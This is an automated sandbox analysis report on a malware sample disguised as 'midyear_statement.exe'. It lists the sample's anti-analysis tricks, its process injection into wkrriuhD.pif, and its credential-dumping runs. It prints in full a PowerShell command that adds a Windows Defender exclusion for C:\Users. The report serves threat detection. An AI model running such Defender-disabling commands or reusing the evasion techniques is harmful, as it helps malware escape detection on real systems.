Source: C:\Users\Public\Libraries\wkrriuhD.pif	Window / User API: foregroundWindowGot 1755	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\Public\Libraries\wkrriuhD.pif

API coverage: 9.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep count: 5574 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep count: 4195 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928	Thread sleep count: 143 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928	Thread sleep time: -429000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7924	Thread sleep count: 139 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7924	Thread sleep time: -69500s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928	Thread sleep count: 9520 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928	Thread sleep time: -28560000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_040A5878
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	24_2_00401612
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	24_2_0040128D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12339253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_12339253
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1234C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	24_2_1234C291
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	24_2_1233C34D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12339665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_12339665
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12349AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	24_2_12349AF5
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_1233BB30
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233783C FindFirstFileW,FindNextFileW,	24_2_1233783C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	24_2_1233880C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1237E879 FindFirstFileExA,	24_2_1237E879
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	24_2_1233BD37
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_146410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	24_2_146410F1
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14646580 FindFirstFileExA,	24_2_14646580
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0040AE51 FindFirstFileW,FindNextFileW,	27_2_0040AE51
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	28_2_00407EF8

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12337C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

24_2_12337C97

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 27_2_00418981 memset,GetSystemInfo,

27_2_00418981

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: svchost.exe, 00000009.00000002.3646811739.0000026BC204B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2080000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.000000000077B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: svchost.exe, 00000009.00000002.3646615871.0000026BC202B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000085C000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124E9000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124E0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124E9000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382585003.00000000124E5000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.3644458412.0000026BC2002000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: bhv348F.tmp.27.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWj
Source: svchost.exe, 00000009.00000002.3647045184.0000026BC208D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000`
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{#s
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW_
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.3646811739.0000026BC204B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\midyear_statement.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\wkrriuhD.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\wkrriuhD.pif	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1236BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

24_2_1236BB22

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

27_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_040B7A50

Contains functionality to read the PEB

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_0059113F mov eax, dword ptr fs:[00000030h]	24_2_0059113F
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_0059113F mov eax, dword ptr fs:[00000030h]	24_2_0059113F
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005D4097 mov eax, dword ptr fs:[00000030h]	24_2_005D4097
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123732B5 mov eax, dword ptr fs:[00000030h]	24_2_123732B5
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14644AB4 mov eax, dword ptr fs:[00000030h]	24_2_14644AB4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12341CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

24_2_12341CFE

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process token adjusted: Debug

Source: C:\Windows \System32\2506803.exe	Code function: 16_2_613C21C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_613C21C0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1236BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_1236BB22
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12364B47 SetUnhandledExceptionFilter,	24_2_12364B47
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123649F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_123649F9
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12364FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_12364FDC
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14642639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_14642639
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_146460E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_146460E2
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14642B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_14642B1C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\midyear_statement.exe	Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_123480EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

24_2_123480EF

Maps a DLL or memory area into another process

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\midyear_statement.exe	Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 293008	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 2C2008
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 3B2008

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

24_2_123420F7

Contains functionality to simulate mouse events

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12349627 mouse_event,

24_2_12349627

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif

Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerP5\0
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager"
Source: wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager573ef12
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerP5\
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerk
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerP5\22
Source: wkrriuhD.pif, 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerP5\511
Source: wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, logs.dat.24.dr	Binary or memory string: [Program Manager]

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_005C5A34 cpuid

24_2_005C5A34

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_040A5A3C
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: GetLocaleInfoA,	0_2_040AA708
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: GetLocaleInfoA,	0_2_040AA754
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_040A5B48
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoA,	24_2_1233F8D1
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoW,	24_2_12382313
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: EnumSystemLocalesW,	24_2_12382036
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	24_2_123820C3
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	24_2_12382610
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	24_2_1238243C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: EnumSystemLocalesW,	24_2_12378404
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoW,	24_2_12382543
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: GetLocaleInfoW,	24_2_123788ED
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: EnumSystemLocalesW,	24_2_12381F50
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: EnumSystemLocalesW,	24_2_12381F9B
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	24_2_12381CD8

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
